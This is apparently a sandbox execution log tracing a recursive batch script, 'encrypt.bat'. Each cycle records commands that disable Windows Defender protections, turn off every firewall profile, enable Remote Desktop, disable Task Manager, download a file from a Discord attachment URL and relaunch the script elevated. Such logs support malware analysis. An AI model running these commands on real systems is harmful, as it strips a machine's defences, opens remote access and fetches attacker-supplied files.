depth 56 | PID:3716 | C:\Windows\system32\netsh.exe | netsh advfirewall set allprofiles state off | Modifies Windows Firewall
depth 56 | PID:2676 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
depth 56 | PID:4360 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
depth 56 | PID:4660 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
depth 56 | PID:2780 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true"
depth 56 | PID:320 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true"
depth 56 | PID:4292 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
depth 56 | PID:2872 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')" | Blocklisted process makes network request
depth 56 | PID:4524 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs" | Command and Scripting Interpreter: PowerShell
depth 57 | PID:3240 | C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
depth 58 | PID:3060 | C:\Windows\system32\reg.exe | reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
depth 58 | PID:616 | C:\Windows\system32\reg.exe | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
depth 58 | PID:2744 | C:\Windows\system32\reg.exe | reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
depth 58 | PID:420 | C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
depth 58 | PID:2672 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
depth 58 | PID:448 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
depth 58 | PID:1748 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true"
depth 58 | PID:4292 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true"
depth 58 | PID:836 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
depth 58 | PID:4444 | C:\Windows\system32\netsh.exe | netsh firewall set opmode disable
depth 58 | PID:2992 | C:\Windows\system32\netsh.exe | netsh firewall set opmode mode=DISABLE
depth 58 | PID:2964 | C:\Windows\system32\netsh.exe | netsh advfirewall set currentprofile state off
depth 58 | PID:2860 | C:\Windows\system32\netsh.exe | netsh advfirewall set domainprofile state off
depth 58 | PID:2044 | C:\Windows\system32\netsh.exe | netsh advfirewall set privateprofile state off
depth 58 | PID:2908 | C:\Windows\system32\netsh.exe | netsh advfirewall set publicprofile state off
depth 58 | PID:804 | C:\Windows\system32\netsh.exe | netsh advfirewall set allprofiles state off
depth 58 | PID:4564 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
depth 58 | PID:3640 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
depth 58 | PID:2664 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
depth 58 | PID:4808 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true"
depth 58 | PID:3560 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true"
depth 58 | PID:620 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
depth 58 | PID:1340 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')" | Blocklisted process makes network request
depth 58 | PID:4152 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs" | Command and Scripting Interpreter: PowerShell
depth 59 | PID:4376 | C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
depth 60 | PID:4284 | C:\Windows\system32\reg.exe | reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
depth 60 | PID:328 | C:\Windows\system32\reg.exe | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
depth 60 | PID:4532 | C:\Windows\system32\reg.exe | reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
depth 60 | PID:2664 | C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
depth 60 | PID:2184 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
depth 60 | PID:1556 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
depth 60 | PID:3560 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true"
depth 60 | PID:320 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true"
depth 60 | PID:1108 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
depth 60 | PID:3436 | C:\Windows\system32\netsh.exe | netsh firewall set opmode disable
depth 60 | PID:4696 | C:\Windows\system32\netsh.exe | netsh firewall set opmode mode=DISABLE
depth 60 | PID:2180 | C:\Windows\system32\netsh.exe | netsh advfirewall set currentprofile state off
depth 60 | PID:4292 | C:\Windows\system32\netsh.exe | netsh advfirewall set domainprofile state off
depth 60 | PID:4208 | C:\Windows\system32\netsh.exe | netsh advfirewall set privateprofile state off
depth 60 | PID:3856 | C:\Windows\system32\netsh.exe | netsh advfirewall set publicprofile state off
depth 60 | PID:3060 | C:\Windows\system32\netsh.exe | netsh advfirewall set allprofiles state off
depth 60 | PID:4132 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
depth 60 | PID:444 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
depth 60 | PID:2848 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
depth 60 | PID:4800 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true"
depth 60 | PID:3552 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true"
depth 60 | PID:2488 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
depth 60 | PID:1868 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"
depth 60 | PID:4132 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs" | Command and Scripting Interpreter: PowerShell; Modifies registry class
depth 61 | PID:3420 | C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
depth 62 | PID:1456 | C:\Windows\system32\reg.exe | reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
depth 62 | PID:1036 | C:\Windows\system32\reg.exe | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
depth 62 | PID:444 | C:\Windows\system32\reg.exe | reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
depth 62 | PID:4128 | C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
depth 62 | PID:2844 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
depth 62 | PID:2908 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
depth 62 | PID:3244 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true"
depth 62 | PID:3552 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true"
depth 62 | PID:4968 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
depth 62 | PID:1356 | C:\Windows\system32\netsh.exe | netsh firewall set opmode disable
depth 62 | PID:2292 | C:\Windows\system32\netsh.exe | netsh firewall set opmode mode=DISABLE
depth 62 | PID:4820 | C:\Windows\system32\netsh.exe | netsh advfirewall set currentprofile state off
depth 62 | PID:428 | C:\Windows\system32\netsh.exe | netsh advfirewall set domainprofile state off
depth 62 | PID:2252 | C:\Windows\system32\netsh.exe | netsh advfirewall set privateprofile state off
depth 62 | PID:3064 | C:\Windows\system32\netsh.exe | netsh advfirewall set publicprofile state off
depth 62 | PID:4860 | C:\Windows\system32\netsh.exe | netsh advfirewall set allprofiles state off
depth 62 | PID:1276 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
depth 62 | PID:4928 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
depth 62 | PID:4492 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
depth 62 | PID:1084 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true"
depth 62 | PID:1580 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true"
depth 62 | PID:4440 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
depth 62 | PID:3588 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')" | Blocklisted process makes network request
depth 62 | PID:4128 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs" | Command and Scripting Interpreter: PowerShell
depth 63 | PID:3900 | C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
depth 64 | PID:4928 | C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
depth 64 | PID:392 | C:\Windows\system32\reg.exe | reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
depth 64 | PID:3096 | C:\Windows\system32\reg.exe | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
depth 64 | PID:1108 | C:\Windows\system32\reg.exe | reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
depth 64 | PID:4876 | C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
depth 64 | PID:3180 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
depth 64 | PID:1752 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
depth 64 | PID:1416 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true"
depth 64 | PID:1924 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true"
depth 64 | PID:4860 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
depth 64 | PID:1076 | C:\Windows\system32\netsh.exe | netsh firewall set opmode disable | Modifies Windows Firewall
depth 64 | PID:3036 | C:\Windows\system32\netsh.exe | netsh firewall set opmode mode=DISABLE | Modifies Windows Firewall
depth 64 | PID:2944 | C:\Windows\system32\netsh.exe | netsh advfirewall set currentprofile state off
depth 64 | PID:2776 | C:\Windows\system32\netsh.exe | netsh advfirewall set domainprofile state off
depth 64 | PID:2984 | C:\Windows\system32\netsh.exe | netsh advfirewall set privateprofile state off | Modifies Windows Firewall
depth 64 | PID:968 | C:\Windows\system32\netsh.exe | netsh advfirewall set publicprofile state off
depth 64 | PID:1680 | C:\Windows\system32\netsh.exe | netsh advfirewall set allprofiles state off | Modifies Windows Firewall
depth 64 | PID:424 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
depth 64 | PID:2740 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
depth 64 | PID:1084 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
depth 64 | PID:3048 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true"
depth 64 | PID:3144 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true"
depth 64 | PID:4300 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
depth 64 | PID:2044 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')" | Blocklisted process makes network request
depth 64 | PID:2928 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs" | Command and Scripting Interpreter: PowerShell
depth 65 | PID:2904 | C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
depth 66 | PID:2004 | C:\Windows\system32\reg.exe | reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
depth 66 | PID:1868 | C:\Windows\system32\reg.exe | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
depth 66 | PID:932 | C:\Windows\system32\reg.exe | reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
depth 66 | PID:2740 | C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
depth 66 | PID:3084 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
depth 66 | PID:1416 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
depth 66 | PID:4608 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true"
depth 66 | PID:4144 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true"
depth 66 | PID:4236 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
depth 66 | PID:4796 | C:\Windows\system32\netsh.exe | netsh firewall set opmode disable
depth 66 | PID:4508 | C:\Windows\system32\netsh.exe | netsh firewall set opmode mode=DISABLE
depth 66 | PID:1384 | C:\Windows\system32\netsh.exe | netsh advfirewall set currentprofile state off
depth 66 | PID:4016 | C:\Windows\system32\netsh.exe | netsh advfirewall set domainprofile state off
depth 66 | PID:992 | C:\Windows\system32\netsh.exe | netsh advfirewall set privateprofile state off
depth 66 | PID:3900 | C:\Windows\system32\netsh.exe | netsh advfirewall set publicprofile state off
depth 66 | PID:2860 | C:\Windows\system32\netsh.exe | netsh advfirewall set allprofiles state off
depth 66 | PID:932 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
depth 66 | PID:2012 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
depth 66 | PID:2624 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
depth 66 | PID:2524 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true"
depth 66 | PID:2220 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true"
depth 66 | PID:528 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
depth 66 | PID:4580 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')" | Blocklisted process makes network request
depth 66 | PID:4432 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs" | Command and Scripting Interpreter: PowerShell
depth 67 | PID:444 | C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
depth 68 | PID:4304 | C:\Windows\system32\reg.exe | reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
depth 68 | PID:4880 | C:\Windows\system32\reg.exe | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
depth 68 | PID:4616 | C:\Windows\system32\reg.exe | reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
depth 68 | PID:4640 | C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
depth 68 | PID:1920 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
depth 68 | PID:3420 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
depth 68 | PID:2892 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true"
depth 68 | PID:3592 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true"
depth 68 | PID:2004 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
depth 68 | PID:4440 | C:\Windows\system32\netsh.exe | netsh firewall set opmode disable
depth 68 | PID:2684 | C:\Windows\system32\netsh.exe | netsh firewall set opmode mode=DISABLE
depth 68 | PID:4836 | C:\Windows\system32\netsh.exe | netsh advfirewall set currentprofile state off
depth 68 | PID:880 | C:\Windows\system32\netsh.exe | netsh advfirewall set domainprofile state off | Modifies Windows Firewall
depth 68 | PID:5060 | C:\Windows\system32\netsh.exe | netsh advfirewall set privateprofile state off | Modifies Windows Firewall
depth 68 | PID:1912 | C:\Windows\system32\netsh.exe | netsh advfirewall set publicprofile state off
depth 68 | PID:4632 | C:\Windows\system32\netsh.exe | netsh advfirewall set allprofiles state off
depth 68 | PID:2676 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
depth 68 | PID:3236 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true" | Command and Scripting Interpreter: PowerShell
depth 68 | PID:3016 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
depth 68 | PID:1196 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true"
depth 68 | PID:2060 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true"
depth 68 | PID:3552 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
depth 68 | PID:1912 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')" | Blocklisted process makes network request
depth 68 | PID:4936 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs" | Command and Scripting Interpreter: PowerShell
depth 69 | PID:4524 | C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
depth 70 | PID:1000 | C:\Windows\system32\reg.exe | reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
depth 70 | PID:4700 | C:\Windows\system32\reg.exe | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
depth 70 | PID:1792 | C:\Windows\system32\reg.exe | reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
depth 70 | PID:4172 | C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
depth 70 | PID:1232 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
depth 70 | PID:960 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
depth 70 | PID:2072 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true"
depth 70 | PID:2228 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true"
depth 70 | PID:4616 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
depth 70 | PID:4956 | C:\Windows\system32\netsh.exe | netsh firewall set opmode disable | Modifies Windows Firewall
depth 70 | PID:3596 | C:\Windows\system32\netsh.exe | netsh firewall set opmode mode=DISABLE | Modifies Windows Firewall
depth 70 | PID:1708 | C:\Windows\system32\netsh.exe | netsh advfirewall set currentprofile state off
depth 70 | PID:2288 | C:\Windows\system32\netsh.exe | netsh advfirewall set domainprofile state off
depth 70 | PID:4360 | C:\Windows\system32\netsh.exe | netsh advfirewall set privateprofile state off
depth 70 | PID:4924 | C:\Windows\system32\netsh.exe | netsh advfirewall set publicprofile state off
depth 70 | PID:1000 | C:\Windows\system32\netsh.exe | netsh advfirewall set allprofiles state off
depth 70 | PID:1792 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
depth 70 | PID:4864 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
depth 70 | PID:4796 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
depth 70 | PID:2740 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true"
depth 70 | PID:1084 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true"
depth 70 | PID:3152 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
depth 70 | PID:456 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')" | Blocklisted process makes network request
depth 70 | PID:2996 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs" | Command and Scripting Interpreter: PowerShell; Modifies registry class
depth 71 | PID:3244 | C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
depth 72 | PID:3684 | C:\Windows\system32\reg.exe | reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
depth 72 | PID:3060 | C:\Windows\system32\reg.exe | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
depth 72 | PID:712 | C:\Windows\system32\reg.exe | reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
depth 72 | PID:4612 | C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
depth 72 | PID:4088 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
depth 72 | PID:880 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
